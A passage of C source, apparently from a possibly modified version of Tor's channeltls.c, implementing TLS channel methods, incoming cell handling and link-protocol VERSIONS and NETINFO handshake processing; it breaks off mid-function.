log_debug(LD_CHANNEL, "Done shutting down TLS channels"); } /** * Create a new channel around an incoming or_connection_t */ channel_t * channel_tls_handle_incoming(or_connection_t *orconn) { channel_tls_t *tlschan = tor_malloc_zero(sizeof(*tlschan)); channel_t *chan = &(tlschan->base_); tor_assert(orconn); tor_assert(!(orconn->chan)); channel_tls_common_init(tlschan); /* Link the channel and orconn to each other */ tlschan->conn = orconn; orconn->chan = chan; if (is_local_addr(&(TO_CONN(orconn)->addr))) channel_mark_local(chan); channel_mark_incoming(chan); /* Register it */ channel_register(chan); return chan; } /********* * Casts * ********/ /** * Cast a channel_tls_t to a channel_t. */ channel_t * channel_tls_to_base(channel_tls_t *tlschan) { if (!tlschan) return NULL; return &(tlschan->base_); } or_connection_t * channel_tls_to_orconn(channel_tls_t *tlschan) { if (!tlschan) return NULL; return tlschan->conn; } /** * Cast a channel_t to a channel_tls_t, with appropriate type-checking * asserts. */ channel_tls_t * channel_tls_from_base(channel_t *chan) { if (!chan) return NULL; tor_assert(chan->magic == TLS_CHAN_MAGIC); return (channel_tls_t *)(chan); } /******************************************** * Method implementations for channel_tls_t * *******************************************/ /** * Close a channel_tls_t * * This implements the close method for channel_tls_t */ static void channel_tls_close_method(channel_t *chan) { channel_tls_t *tlschan = BASE_CHAN_TO_TLS(chan); tor_assert(tlschan); if (tlschan->conn) connection_or_close_normally(tlschan->conn, 1); else { /* Weird - we'll have to change the state ourselves, I guess */ log_info(LD_CHANNEL, "Tried to close channel_tls_t %p with NULL conn", tlschan); channel_change_state(chan, CHANNEL_STATE_ERROR); } } /** * Describe the transport for a channel_tls_t * * This returns the string "TLS channel on connection <id>" to the upper * layer. */ static const char * channel_tls_describe_transport_method(channel_t *chan) { static char *buf = NULL; uint64_t id; channel_tls_t *tlschan; const char *rv = NULL; tor_assert(chan); tlschan = BASE_CHAN_TO_TLS(chan); if (tlschan->conn) { id = TO_CONN(tlschan->conn)->global_identifier; if (buf) tor_free(buf); tor_asprintf(&buf, "TLS channel (connection " U64_FORMAT ")", U64_PRINTF_ARG(id)); rv = buf; } else { rv = "TLS channel (no connection)"; } return rv; } /** * Free a channel_tls_t * * This is called by the generic channel layer when freeing a channel_tls_t; * this happens either on a channel which has already reached * CHANNEL_STATE_CLOSED or CHANNEL_STATE_ERROR from channel_run_cleanup() or * on shutdown from channel_free_all(). In the latter case we might still * have an orconn active (which connection_free_all() will get to later), * so we should null out its channel pointer now. */ static void channel_tls_free_method(channel_t *chan) { channel_tls_t *tlschan = BASE_CHAN_TO_TLS(chan); tor_assert(tlschan); if (tlschan->conn) { tlschan->conn->chan = NULL; tlschan->conn = NULL; } } /** * Get the remote address of a channel_tls_t * * This implements the get_remote_addr method for channel_tls_t; copy the * remote endpoint of the channel to addr_out and return 1 (always * succeeds for this transport). */ static int channel_tls_get_remote_addr_method(channel_t *chan, tor_addr_t *addr_out) { int rv = 0; channel_tls_t *tlschan = BASE_CHAN_TO_TLS(chan); tor_assert(tlschan); tor_assert(addr_out); if (tlschan->conn) { tor_addr_copy(addr_out, &(TO_CONN(tlschan->conn)->addr)); rv = 1; } else tor_addr_make_unspec(addr_out); return rv; } /** * Get the name of the pluggable transport used by a channel_tls_t. * * This implements the get_transport_name for channel_tls_t. If the * channel uses a pluggable transport, copy its name to * <b>transport_out</b> and return 0. If the channel did not use a * pluggable transport, return -1. */ static int channel_tls_get_transport_name_method(channel_t *chan, char **transport_out) { channel_tls_t *tlschan = BASE_CHAN_TO_TLS(chan); tor_assert(tlschan); tor_assert(transport_out); tor_assert(tlschan->conn); if (!tlschan->conn->ext_or_transport) return -1; *transport_out = tor_strdup(tlschan->conn->ext_or_transport); return 0; } /** * Get endpoint description of a channel_tls_t * * This implements the get_remote_descr method for channel_tls_t; it returns * a text description of the remote endpoint of the channel suitable for use * in log messages. The req parameter is 0 for the canonical address or 1 for * the actual address seen. */ static const char * channel_tls_get_remote_descr_method(channel_t *chan, int flags) { #define MAX_DESCR_LEN 32 static char buf[MAX_DESCR_LEN + 1]; channel_tls_t *tlschan = BASE_CHAN_TO_TLS(chan); connection_t *conn; const char *answer = NULL; char *addr_str; tor_assert(tlschan); if (tlschan->conn) { conn = TO_CONN(tlschan->conn); switch (flags) { case 0: /* Canonical address with port*/ tor_snprintf(buf, MAX_DESCR_LEN + 1, "%s:%u", conn->address, conn->port); answer = buf; break; case GRD_FLAG_ORIGINAL: /* Actual address with port */ addr_str = tor_dup_addr(&(tlschan->conn->real_addr)); tor_snprintf(buf, MAX_DESCR_LEN + 1, "%s:%u", addr_str, conn->port); tor_free(addr_str); answer = buf; break; case GRD_FLAG_ADDR_ONLY: /* Canonical address, no port */ strlcpy(buf, conn->address, sizeof(buf)); answer = buf; break; case GRD_FLAG_ORIGINAL|GRD_FLAG_ADDR_ONLY: /* Actual address, no port */ addr_str = tor_dup_addr(&(tlschan->conn->real_addr)); strlcpy(buf, addr_str, sizeof(buf)); tor_free(addr_str); answer = buf; break; default: /* Something's broken in channel.c */ tor_assert(1); } } else { strlcpy(buf, "(No connection)", sizeof(buf)); answer = buf; } return answer; } /** * Tell the upper layer if we have queued writes * * This implements the has_queued_writes method for channel_tls t_; it returns * 1 iff we have queued writes on the outbuf of the underlying or_connection_t. */ static int channel_tls_has_queued_writes_method(channel_t *chan) { size_t outbuf_len; channel_tls_t *tlschan = BASE_CHAN_TO_TLS(chan); tor_assert(tlschan); if (!(tlschan->conn)) { log_info(LD_CHANNEL, "something called has_queued_writes on a tlschan " "(%p with ID " U64_FORMAT " but no conn", chan, U64_PRINTF_ARG(chan->global_identifier)); } outbuf_len = (tlschan->conn != NULL) ? connection_get_outbuf_len(TO_CONN(tlschan->conn)) : 0; return (outbuf_len > 0); } /** * Tell the upper layer if we're canonical * * This implements the is_canonical method for channel_tls_t; if req is zero, * it returns whether this is a canonical channel, and if it is one it returns * whether that can be relied upon. */ static int channel_tls_is_canonical_method(channel_t *chan, int req) { int answer = 0; channel_tls_t *tlschan = BASE_CHAN_TO_TLS(chan); tor_assert(tlschan); if (tlschan->conn) { switch (req) { case 0: answer = tlschan->conn->is_canonical; break; case 1: /* * Is the is_canonical bit reliable? In protocols version 2 and up * we get the canonical address from a NETINFO cell, but in older * versions it might be based on an obsolete descriptor. */ answer = (tlschan->conn->link_proto >= 2); break; default: /* This shouldn't happen; channel.c is broken if it does */ tor_assert(1); } } /* else return 0 for tlschan->conn == NULL */ return answer; } /** * Check if we match an extend_info_t * * This implements the matches_extend_info method for channel_tls_t; the upper * layer wants to know if this channel matches an extend_info_t. */ static int channel_tls_matches_extend_info_method(channel_t *chan, extend_info_t *extend_info) { channel_tls_t *tlschan = BASE_CHAN_TO_TLS(chan); tor_assert(tlschan); tor_assert(extend_info); /* Never match if we have no conn */ if (!(tlschan->conn)) { log_info(LD_CHANNEL, "something called matches_extend_info on a tlschan " "(%p with ID " U64_FORMAT " but no conn", chan, U64_PRINTF_ARG(chan->global_identifier)); return 0; } return (tor_addr_eq(&(extend_info->addr), &(TO_CONN(tlschan->conn)->addr)) && (extend_info->port == TO_CONN(tlschan->conn)->port)); } /** * Check if we match a target address; return true iff we do. * * This implements the matches_target method for channel_tls t_; the upper * layer wants to know if this channel matches a target address when extending * a circuit. */ static int channel_tls_matches_target_method(channel_t *chan, const tor_addr_t *target) { channel_tls_t *tlschan = BASE_CHAN_TO_TLS(chan); tor_assert(tlschan); tor_assert(target); /* Never match if we have no conn */ if (!(tlschan->conn)) { log_info(LD_CHANNEL, "something called matches_target on a tlschan " "(%p with ID " U64_FORMAT " but no conn", chan, U64_PRINTF_ARG(chan->global_identifier)); return 0; } return tor_addr_eq(&(tlschan->conn->real_addr), target); } /** * Write a cell to a channel_tls_t * * This implements the write_cell method for channel_tls_t; given a * channel_tls_t and a cell_t, transmit the cell_t. */ static int channel_tls_write_cell_method(channel_t *chan, cell_t *cell, circuit_t *circ) { channel_tls_t *tlschan = BASE_CHAN_TO_TLS(chan); int written = 0; tor_assert(tlschan); tor_assert(cell); if (tlschan->conn) { log_info(LD_GENERAL, "writing cell on circ %u to conn %p on channel %p", cell->circ_id, tlschan->conn, tlschan); connection_or_write_cell_to_buf(cell, tlschan->conn); ++written; } else { log_info(LD_CHANNEL, "something called write_cell on a tlschan " "(%p with ID " U64_FORMAT " but no conn", chan, U64_PRINTF_ARG(chan->global_identifier)); } return written; } /** * Write a packed cell to a channel_tls_t * * This implements the write_packed_cell method for channel_tls_t; given a * channel_tls_t and a packed_cell_t, transmit the packed_cell_t. */ static int channel_tls_write_packed_cell_method(channel_t *chan, or_connection_t *conn, circuit_t *circ, packed_cell_t *packed_cell) { channel_tls_t *tlschan = BASE_CHAN_TO_TLS(chan); size_t cell_network_size = get_cell_network_size(chan->wide_circ_ids); int written = 0; tor_assert(tlschan); tor_assert(packed_cell); if (tlschan->conn) { connection_write_to_buf(packed_cell->body, cell_network_size, TO_CONN(tlschan->conn)); /* This is where the cell is finished; used to be done from relay.c */ packed_cell_free(packed_cell); ++written; } else { log_info(LD_CHANNEL, "something called write_packed_cell on a tlschan " "(%p with ID " U64_FORMAT " but no conn", chan, U64_PRINTF_ARG(chan->global_identifier)); } return written; } /** * Write a variable-length cell to a channel_tls_t * * This implements the write_var_cell method for channel_tls_t; given a * channel_tls_t and a var_cell_t, transmit the var_cell_t. */ static int channel_tls_write_var_cell_method(channel_t *chan, var_cell_t *var_cell, circuit_t *circ) { channel_tls_t *tlschan = BASE_CHAN_TO_TLS(chan); int written = 0; tor_assert(tlschan); tor_assert(var_cell); if (tlschan->conn) { connection_or_write_var_cell_to_buf(var_cell, tlschan->conn); ++written; } else { log_info(LD_CHANNEL, "something called write_var_cell on a tlschan " "(%p with ID " U64_FORMAT " but no conn", chan, U64_PRINTF_ARG(chan->global_identifier)); } return written; } /************************************************* * Method implementations for channel_listener_t * ************************************************/ /** * Close a channel_listener_t * * This implements the close method for channel_listener_t */ static void channel_tls_listener_close_method(channel_listener_t *chan_l) { tor_assert(chan_l); /* * Listeners we just go ahead and change state through to CLOSED, but * make sure to check if they're channel_tls_listener to NULL it out. */ if (chan_l == channel_tls_listener) channel_tls_listener = NULL; if (!(chan_l->state == CHANNEL_LISTENER_STATE_CLOSING || chan_l->state == CHANNEL_LISTENER_STATE_CLOSED || chan_l->state == CHANNEL_LISTENER_STATE_ERROR)) { channel_listener_change_state(chan_l, CHANNEL_LISTENER_STATE_CLOSING); } if (chan_l->incoming_list) { SMARTLIST_FOREACH_BEGIN(chan_l->incoming_list, channel_t *, ichan) { channel_mark_for_close(ichan); } SMARTLIST_FOREACH_END(ichan); smartlist_free(chan_l->incoming_list); chan_l->incoming_list = NULL; } if (!(chan_l->state == CHANNEL_LISTENER_STATE_CLOSED || chan_l->state == CHANNEL_LISTENER_STATE_ERROR)) { channel_listener_change_state(chan_l, CHANNEL_LISTENER_STATE_CLOSED); } } /** * Describe the transport for a channel_listener_t * * This returns the string "TLS channel (listening)" to the upper * layer. */ static const char * channel_tls_listener_describe_transport_method(channel_listener_t *chan_l) { tor_assert(chan_l); return "TLS channel (listening)"; } /******************************************************* * Functions for handling events on an or_connection_t * ******************************************************/ /** * Handle an orconn state change * * This function will be called by connection_or.c when the or_connection_t * associated with this channel_tls_t changes state. */ void channel_tls_handle_state_change_on_orconn(channel_t *chan, or_connection_t *conn, uint8_t old_state, uint8_t state) { tor_assert(chan); tor_assert(conn); tor_assert(conn->chan == chan); tor_assert(BASE_CHAN_TO_TLS(chan)->conn == conn); /* -Werror appeasement */ tor_assert(old_state == old_state); /* Make sure the base connection state makes sense - shouldn't be error, * closed or listening. */ tor_assert(chan->state == CHANNEL_STATE_OPENING || chan->state == CHANNEL_STATE_OPEN || chan->state == CHANNEL_STATE_MAINT || chan->state == CHANNEL_STATE_CLOSING); /* Did we just go to state open? */ if (state == OR_CONN_STATE_OPEN) { /* * We can go to CHANNEL_STATE_OPEN from CHANNEL_STATE_OPENING or * CHANNEL_STATE_MAINT on this. */ channel_change_state(chan, CHANNEL_STATE_OPEN); } else { /* * Not open, so from CHANNEL_STATE_OPEN we go to CHANNEL_STATE_MAINT, * otherwise no change. */ if (chan->state == CHANNEL_STATE_OPEN) { channel_change_state(chan, CHANNEL_STATE_MAINT); } } } /** * Flush cells from a channel_tls_t * * Try to flush up to about num_cells cells, and return how many we flushed. */ ssize_t channel_tls_flush_some_cells(channel_tls_t *chan, ssize_t num_cells) { ssize_t flushed = 0; tor_assert(chan); if (flushed >= num_cells) goto done; /* * If channel_tls_t ever buffers anything below the channel_t layer, flush * that first here. */ flushed += channel_flush_some_cells(TLS_CHAN_TO_BASE(chan), num_cells - flushed); /* * If channel_tls_t ever buffers anything below the channel_t layer, check * how much we actually got and push it on down here. */ done: return flushed; } /** * Check if a channel_tls_t has anything to flush * * Return true if there is any more to flush on this channel (cells in queue * or active circuits). */ int channel_tls_more_to_flush(channel_tls_t *chan) { tor_assert(chan); /* * If channel_tls_t ever buffers anything below channel_t, the * check for that should go here first. */ return channel_more_to_flush(TLS_CHAN_TO_BASE(chan)); } #ifdef KEEP_TIMING_STATS /** * Timing states wrapper * * This is a wrapper function around the actual function that processes the * <b>cell</b> that just arrived on <b>chan</b>. Increment <b>*time</b> * by the number of microseconds used by the call to <b>*func(cell, chan)</b>. */ static void channel_tls_time_process_cell(cell_t *cell, channel_tls_t *chan, or_connection_t *conn, int *time, void (*func)(cell_t *, channel_tls_t *)) { struct timeval start, end; long time_passed; tor_gettimeofday(&start); (*func)(cell, chan); tor_gettimeofday(&end); time_passed = tv_udiff(&start, &end) ; if (time_passed > 10000) { /* more than 10ms */ log_debug(LD_OR,"That call just took %ld ms.",time_passed/1000); } if (time_passed < 0) { log_info(LD_GENERAL,"That call took us back in time!"); time_passed = 0; } *time += time_passed; } #endif /** * Handle an incoming cell on a channel_tls_t * * This is called from connection_or.c to handle an arriving cell; it checks * for cell types specific to the handshake for this transport protocol and * handles them, and queues all other cells to the channel_t layer, which * eventually will hand them off to command.c. */ void channel_tls_handle_cell(cell_t *cell, or_connection_t *conn) { channel_t *chan; int handshaking; #ifdef KEEP_TIMING_STATS #define PROCESS_CELL(tp, cl, cn, conn) STMT_BEGIN { \ ++num ## tp; \ channel_tls_time_process_cell(cl, cn, conn, & tp ## time , \ channel_tls_process_ ## tp ## _cell); \ } STMT_END #else #define PROCESS_CELL(tp, cl, cn, conn) channel_tls_process_ ## tp ## _cell(cl, cn, conn) #endif tor_assert(cell); tor_assert(conn); chan = conn->chan; if (!chan) { log_warn(LD_CHANNEL, "Got a cell_t on an OR connection with no channel"); return; } handshaking = (TO_CONN(conn)->state != OR_CONN_STATE_OPEN); if (conn->base_.marked_for_close) return; /* Reject all but VERSIONS and NETINFO when handshaking. */ /* (VERSIONS should actually be impossible; it's variable-length.) */ if (handshaking && cell->command != CELL_VERSIONS && cell->command != CELL_NETINFO) { log_fn(LOG_PROTOCOL_WARN, LD_PROTOCOL, "Received unexpected cell command %d in chan state %s / " "conn state %s; closing the connection.", (int)cell->command, channel_state_to_string(chan->state), conn_state_to_string(CONN_TYPE_OR, TO_CONN(conn)->state)); connection_or_close_for_error(conn, 0); return; } if (conn->base_.state == OR_CONN_STATE_OR_HANDSHAKING_V3) or_handshake_state_record_cell(conn, conn->handshake_state, cell, 1); switch (cell->command) { case CELL_PADDING: ++stats_n_padding_cells_processed; /* do nothing */ break; case CELL_VERSIONS: tor_fragile_assert(); break; case CELL_NETINFO: ++stats_n_netinfo_cells_processed; PROCESS_CELL(netinfo, cell, chan, conn); break; case CELL_CREATE: case CELL_CREATE_FAST: case CELL_CREATED: case CELL_CREATED_FAST: case CELL_RELAY: case CELL_RELAY_EARLY: case CELL_DESTROY: case CELL_CREATE2: case CELL_CREATED2: case CELL_TRACK: /* * These are all transport independent and we pass them up through the * channel_t mechanism. They are ultimately handled in command.c. */ channel_queue_cell(chan, cell); break; default: log_fn(LOG_INFO, LD_PROTOCOL, "Cell of unknown type (%d) received in channeltls.c. " "Dropping.", cell->command); break; } } /** * Handle an incoming variable-length cell on a channel_tls_t * * Process a <b>var_cell</b> that was just received on <b>conn</b>. Keep * internal statistics about how many of each cell we've processed so far * this second, and the total number of microseconds it took to * process each type of cell. All the var_cell commands are handshake- * related and live below the channel_t layer, so no variable-length * cells ever get delivered in the current implementation, but I've left * the mechanism in place for future use. */ void channel_tls_handle_var_cell(var_cell_t *var_cell, or_connection_t *conn) { channel_t *chan; #ifdef KEEP_TIMING_STATS /* how many of each cell have we seen so far this second? needs better * name. */ static int num_versions = 0, num_certs = 0; static time_t current_second = 0; /* from previous calls to time */ time_t now = time(NULL); if (current_second == 0) current_second = now; if (now > current_second) { /* the second has rolled over */ /* print stats */ log_info(LD_OR, "At end of second: %d versions (%d ms), %d certs (%d ms)", num_versions, versions_time / ((now - current_second) * 1000), num_certs, certs_time / ((now - current_second) * 1000)); num_versions = num_certs = 0; versions_time = certs_time = 0; /* remember which second it is, for next time */ current_second = now; } #endif tor_assert(var_cell); tor_assert(conn); chan = conn->chan; if (!chan) { log_warn(LD_CHANNEL, "Got a var_cell_t on an OR connection with no channel"); return; } if (TO_CONN(conn)->marked_for_close) return; switch (TO_CONN(conn)->state) { case OR_CONN_STATE_OR_HANDSHAKING_V2: if (var_cell->command != CELL_VERSIONS) { log_fn(LOG_PROTOCOL_WARN, LD_PROTOCOL, "Received a cell with command %d in unexpected " "orconn state \"%s\" [%d], channel state \"%s\" [%d]; " "closing the connection.", (int)(var_cell->command), conn_state_to_string(CONN_TYPE_OR, TO_CONN(conn)->state), TO_CONN(conn)->state, channel_state_to_string(chan->state), (int)(chan->state)); /* * The code in connection_or.c will tell channel_t to close for * error; it will go to CHANNEL_STATE_CLOSING, and then to * CHANNEL_STATE_ERROR when conn is closed. */ connection_or_close_for_error(conn, 0); return; } break; case OR_CONN_STATE_TLS_HANDSHAKING: /* If we're using bufferevents, it's entirely possible for us to * notice "hey, data arrived!" before we notice "hey, the handshake * finished!" And we need to be accepting both at once to handle both * the v2 and v3 handshakes. */ /* fall through */ case OR_CONN_STATE_TLS_SERVER_RENEGOTIATING: if (!(command_allowed_before_handshake(var_cell->command))) { log_fn(LOG_PROTOCOL_WARN, LD_PROTOCOL, "Received a cell with command %d in unexpected " "orconn state \"%s\" [%d], channel state \"%s\" [%d]; " "closing the connection.", (int)(var_cell->command), conn_state_to_string(CONN_TYPE_OR, TO_CONN(conn)->state), (int)(TO_CONN(conn)->state), channel_state_to_string(chan->state), (int)(chan->state)); /* see above comment about CHANNEL_STATE_ERROR */ connection_or_close_for_error(conn, 0); return; } else { if (enter_v3_handshake_with_cell(var_cell, chan, conn) < 0) return; } break; case OR_CONN_STATE_OR_HANDSHAKING_V3: if (var_cell->command != CELL_AUTHENTICATE) or_handshake_state_record_var_cell(conn, conn->handshake_state, var_cell, 1); break; /* Everything is allowed */ case OR_CONN_STATE_OPEN: if (conn->link_proto < 3) { log_fn(LOG_PROTOCOL_WARN, LD_PROTOCOL, "Received a variable-length cell with command %d in orconn " "state %s [%d], channel state %s [%d] with link protocol %d; " "ignoring it.", (int)(var_cell->command), conn_state_to_string(CONN_TYPE_OR, TO_CONN(conn)->state), (int)(TO_CONN(conn)->state), channel_state_to_string(chan->state), (int)(chan->state), (int)(conn->link_proto)); return; } break; default: log_fn(LOG_PROTOCOL_WARN, LD_PROTOCOL, "Received var-length cell with command %d in unexpected " "orconn state \"%s\" [%d], channel state \"%s\" [%d]; " "ignoring it.", (int)(var_cell->command), conn_state_to_string(CONN_TYPE_OR, TO_CONN(conn)->state), (int)(TO_CONN(conn)->state), channel_state_to_string(chan->state), (int)(chan->state)); return; } /* Now handle the cell */ switch (var_cell->command) { case CELL_VERSIONS: ++stats_n_versions_cells_processed; PROCESS_CELL(versions, var_cell, chan, conn); break; case CELL_VPADDING: ++stats_n_vpadding_cells_processed; /* Do nothing */ break; case CELL_CERTS: ++stats_n_certs_cells_processed; PROCESS_CELL(certs, var_cell, chan, conn); break; case CELL_AUTH_CHALLENGE: ++stats_n_auth_challenge_cells_processed; PROCESS_CELL(auth_challenge, var_cell, chan, conn); break; case CELL_AUTHENTICATE: ++stats_n_authenticate_cells_processed; PROCESS_CELL(authenticate, var_cell, chan, conn); break; case CELL_AUTHORIZE: ++stats_n_authorize_cells_processed; /* Ignored so far. */ break; default: log_fn(LOG_INFO, LD_PROTOCOL, "Variable-length cell of unknown type (%d) received.", (int)(var_cell->command)); break; } } void channel_tls_add_connection(channel_t *chan, or_connection_t *conn) { tor_assert(chan); tor_assert(conn); channel_tls_t *tlschan = BASE_CHAN_TO_TLS(chan); tlschan->conn = conn; } void channel_tls_remove_connection(channel_t *chan, or_connection_t *conn) { tor_assert(chan); tor_assert(conn); if(chan->magic != TLS_CHAN_MAGIC) { log_warn(LD_CHANNEL, "channel %p: magic value incorrect, channel has most likely been freed, skipping", chan); return; } channel_tls_t *tlschan = BASE_CHAN_TO_TLS(chan); /* Don't transition if we're already in closing, closed or error */ if (!(chan->state == CHANNEL_STATE_CLOSING || chan->state == CHANNEL_STATE_CLOSED || chan->state == CHANNEL_STATE_ERROR)) { channel_close_from_lower_layer(chan); } else { channel_closed(chan); } tlschan->conn = NULL; } void channel_tls_start_writing(channel_t *chan) { tor_assert(chan); channel_tls_t *tlschan = BASE_CHAN_TO_TLS(chan); if(!connection_is_writing(TO_CONN(tlschan->conn))) { /* autotuning, libevent will tell us to add to pending queue */ connection_start_writing(TO_CONN(tlschan->conn)); } } /** * Check if this cell type is allowed before the handshake is finished * * Return true if <b>command</b> is a cell command that's allowed to start a * V3 handshake. */ static int command_allowed_before_handshake(uint8_t command) { switch (command) { case CELL_VERSIONS: case CELL_VPADDING: case CELL_AUTHORIZE: return 1; default: return 0; } } /** * Start a V3 handshake on an incoming connection * * Called when we as a server receive an appropriate cell while waiting * either for a cell or a TLS handshake. Set the connection's state to * "handshaking_v3', initializes the or_handshake_state field as needed, * and add the cell to the hash of incoming cells.) */ static int enter_v3_handshake_with_cell(var_cell_t *cell, channel_t *chan, or_connection_t *conn) { int started_here = 0; tor_assert(cell); tor_assert(chan); tor_assert(conn); started_here = connection_or_nonopen_was_started_here(conn); tor_assert(TO_CONN(conn)->state == OR_CONN_STATE_TLS_HANDSHAKING || TO_CONN(conn)->state == OR_CONN_STATE_TLS_SERVER_RENEGOTIATING); if (started_here) { log_fn(LOG_PROTOCOL_WARN, LD_OR, "Received a cell while TLS-handshaking, not in " "OR_HANDSHAKING_V3, on a connection we originated."); } connection_or_block_renegotiation(conn); conn->base_.state = OR_CONN_STATE_OR_HANDSHAKING_V3; if (connection_init_or_handshake_state(conn, started_here) < 0) { connection_or_close_for_error(conn, 0); return -1; } or_handshake_state_record_var_cell(conn, conn->handshake_state, cell, 1); return 0; } /** * Process a 'versions' cell. * * This function is called to handle an incoming VERSIONS cell; the current * link protocol version must be 0 to indicate that no version has yet been * negotiated. We compare the versions in the cell to the list of versions * we support, pick the highest version we have in common, and continue the * negotiation from there. */ static void channel_tls_process_versions_cell(var_cell_t *cell, channel_t *chan, or_connection_t *conn) { int highest_supported_version = 0; const uint8_t *cp, *end; int started_here = 0; tor_assert(cell); tor_assert(chan); tor_assert(conn); if ((cell->payload_len % 2) == 1) { log_fn(LOG_PROTOCOL_WARN, LD_OR, "Received a VERSION cell with odd payload length %d; " "closing connection.",cell->payload_len); connection_or_close_for_error(conn, 0); return; } started_here = connection_or_nonopen_was_started_here(conn); if (conn->link_proto != 0 || (conn->handshake_state && conn->handshake_state->received_versions)) { log_fn(LOG_PROTOCOL_WARN, LD_OR, "Received a VERSIONS cell on a connection with its version " "already set to %d; dropping", (int)(conn->link_proto)); return; } switch (conn->base_.state) { case OR_CONN_STATE_OR_HANDSHAKING_V2: case OR_CONN_STATE_OR_HANDSHAKING_V3: break; case OR_CONN_STATE_TLS_HANDSHAKING: case OR_CONN_STATE_TLS_SERVER_RENEGOTIATING: default: log_fn(LOG_PROTOCOL_WARN, LD_OR, "VERSIONS cell while in unexpected state"); return; } tor_assert(conn->handshake_state); end = cell->payload + cell->payload_len; for (cp = cell->payload; cp+1 < end; cp += 2) { uint16_t v = ntohs(get_uint16(cp)); if (is_or_protocol_version_known(v) && v > highest_supported_version) highest_supported_version = v; } if (!highest_supported_version) { log_fn(LOG_PROTOCOL_WARN, LD_OR, "Couldn't find a version in common between my version list and the " "list in the VERSIONS cell; closing connection."); connection_or_close_for_error(conn, 0); return; } else if (highest_supported_version == 1) { /* Negotiating version 1 makes no sense, since version 1 has no VERSIONS * cells. */ log_fn(LOG_PROTOCOL_WARN, LD_OR, "Used version negotiation protocol to negotiate a v1 connection. " "That's crazily non-compliant. Closing connection."); connection_or_close_for_error(conn, 0); return; } else if (highest_supported_version < 3 && conn->base_.state == OR_CONN_STATE_OR_HANDSHAKING_V3) { log_fn(LOG_PROTOCOL_WARN, LD_OR, "Negotiated link protocol 2 or lower after doing a v3 TLS " "handshake. Closing connection."); connection_or_close_for_error(conn, 0); return; } else if (highest_supported_version != 2 && conn->base_.state == OR_CONN_STATE_OR_HANDSHAKING_V2) { /* XXXX This should eventually be a log_protocol_warn */ log_fn(LOG_WARN, LD_OR, "Negotiated link with non-2 protocol after doing a v2 TLS " "handshake with %s. Closing connection.", fmt_addr(&conn->base_.addr)); connection_or_close_for_error(conn, 0); return; } conn->link_proto = highest_supported_version; conn->handshake_state->received_versions = 1; if (conn->link_proto == 2) { log_info(LD_OR, "Negotiated version %d with %s:%d; sending NETINFO.", highest_supported_version, safe_str_client(conn->base_.address), conn->base_.port); if (connection_or_send_netinfo(conn) < 0) { connection_or_close_for_error(conn, 0); return; } } else { const int send_versions = !started_here; /* If we want to authenticate, send a CERTS cell */ const int send_certs = !started_here || public_server_mode(get_options()); /* If we're a host that got a connection, ask for authentication. */ const int send_chall = !started_here; /* If our certs cell will authenticate us, we can send a netinfo cell * right now. */ const int send_netinfo = !started_here; const int send_any = send_versions || send_certs || send_chall || send_netinfo; tor_assert(conn->link_proto >= 3); log_info(LD_OR, "Negotiated version %d with %s:%d; %s%s%s%s%s", highest_supported_version, safe_str_client(conn->base_.address), conn->base_.port, send_any ? "Sending cells:" : "Waiting for CERTS cell", send_versions ? " VERSIONS" : "", send_certs ? " CERTS" : "", send_chall ? " AUTH_CHALLENGE" : "", send_netinfo ? " NETINFO" : ""); #ifdef DISABLE_V3_LINKPROTO_SERVERSIDE if (1) { connection_or_close_normally(conn, 1); return; } #endif if (send_versions) { if (connection_or_send_versions(conn, 1) < 0) { log_warn(LD_OR, "Couldn't send versions cell"); connection_or_close_for_error(conn, 0); return; } } /* We set this after sending the verions cell. */ /*XXXXX symbolic const.*/ chan->wide_circ_ids = conn->link_proto >= MIN_LINK_PROTO_FOR_WIDE_CIRC_IDS; conn->wide_circ_ids = chan->wide_circ_ids; if (send_certs) { if (connection_or_send_certs_cell(conn) < 0) { log_warn(LD_OR, "Couldn't send certs cell"); connection_or_close_for_error(conn, 0); return; } } if (send_chall) { if (connection_or_send_auth_challenge_cell(conn) < 0) { log_warn(LD_OR, "Couldn't send auth_challenge cell"); connection_or_close_for_error(conn, 0); return; } } if (send_netinfo) { if (connection_or_send_netinfo(conn) < 0) { log_warn(LD_OR, "Couldn't send netinfo cell"); connection_or_close_for_error(conn, 0); return; } } } } /** * Process a 'netinfo' cell * * This function is called to handle an incoming NETINFO cell; read and act * on its contents, and set the connection state to "open". */ static void channel_tls_process_netinfo_cell(cell_t *cell, channel_t *chan, or_connection_t *conn) { time_t timestamp; uint8_t my_addr_type; uint8_t my_addr_len; const uint8_t *my_addr_ptr; const uint8_t *cp, *end; uint8_t n_other_addrs; time_t now = time(NULL); long apparent_skew = 0; tor_addr_t my_apparent_addr = TOR_ADDR_NULL; tor_assert(cell); tor_assert(chan); tor_assert(conn); if (conn->link_proto < 2) { log_fn(LOG_PROTOCOL_WARN, LD_OR, "Received a NETINFO cell on %s connection; dropping.", conn->link_proto == 0 ? "non-versioned" : "a v1"); return; } if (conn->base_.state != OR_CONN_STATE_OR_HANDSHAKING_V2 && conn->base_.state != OR_CONN_STATE_OR_HANDSHAKING_V3) { log_fn(LOG_PROTOCOL_WARN, LD_OR, "Received a NETINFO cell on non-handshaking connection; dropping."); return; } tor_assert(conn->handshake_state && conn->handshake_state->received_versions); if (conn->base_.state == OR_CONN_STATE_OR_HANDSHAKING_V3) { tor_assert(conn->link_proto >= 3); if (conn->handshake_state->started_here) { if (!(conn->handshake_state->authenticated)) { log_fn(LOG_PROTOCOL_WARN, LD_OR, "Got a NETINFO cell from server, " "but no authentication. Closing the connection."); connection_or_close_for_error(conn, 0); return; } } else { /* we're the server. If the client never authenticated, we have some housekeeping to do.*/ if (!(conn->handshake_state->authenticated)) { tor_assert(tor_digest_is_zero( (const char*)(conn->handshake_state-> authenticated_peer_id))); channel_set_circid_type(chan, NULL, conn->link_proto < MIN_LINK_PROTO_FOR_WIDE_CIRC_IDS); connection_or_init_conn_from_address(conn, &(conn->base_.addr), conn->base_.port, (const char*)(conn->handshake_state-> authenticated_peer_id), 0); } } } /* Decode the cell. */ timestamp = ntohl(get_uint32(cell->payload)); if (labs(now - conn->handshake_state->sent_versions_at) < 180) { apparent_skew = now - timestamp; } my_addr_type = (uint8_t) cell->payload[4]; my_addr_len = (uint8_t) cell->payload[5]; my_addr_ptr = (uint8_t*) cell->payload + 6; end = cell->payload + CELL_PAYLOAD_SIZE; cp = cell->payload + 6 + my_addr_len; /* We used to check: * if (my_addr_len >= CELL_PAYLOAD_SIZE - 6) { * * This is actually never going to happen, since my_addr_len is at most 255, * and CELL_PAYLOAD_LEN - 6 is 503. So we know that cp is < end. */ if (my_addr_type == RESOLVED_TYPE_IPV4 && my_addr_len == 4) { 